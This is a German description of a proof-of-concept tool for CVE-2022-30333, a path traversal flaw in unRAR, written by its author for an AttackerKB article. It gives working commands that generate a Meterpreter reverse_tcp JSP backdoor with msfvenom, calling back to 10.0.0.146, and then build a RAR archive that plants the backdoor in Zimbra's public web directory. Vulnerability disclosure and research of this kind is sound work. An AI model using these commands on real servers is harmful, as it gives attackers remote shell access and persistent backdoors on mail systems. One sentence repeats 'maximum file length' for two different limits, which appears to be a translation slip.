
Erzeugt schädliche RAR-Archive, die eine Path-Traversal-Schwachstelle in unRAR ausnutzen, um Dateien an beliebigen Orten zu platzieren, demonstriert mit einer Zimbra-Hintertür.
Ein Proof-of-Concept für CVE-2022-30333 – eine Path-Traversal-Schwachstelle in unRAR-Versionen vor 6.11. Ich habe dies als Demonstration des Exploits für einen AttackerKB-Artikel erstellt und hoffe, es bald in ein Metasploit-Modul zu integrieren!
Im Grunde genommen geben Sie ein Ziel (einschließlich Pfadtraversal) und einige Dateidaten an, und dieses Tool generiert eine .rar-Datei, die diese Datei an diesen Ort extrahiert. Die maximale Dateilänge beträgt 104 Bytes und die maximale Dateilänge beträgt 4096 Bytes. (Das ist nicht intrinsisch für die Schwachstelle, es ist nur das, was ich gewählt habe, als ich die Datei generiert habe).
Erzeugen Sie zum Beispiel eine Backdoor mit msfvenom:
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp
Erstellen Sie dann eine .rar-Datei und platzieren Sie die .jsp an einen unterhaltsamen Ort:
$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar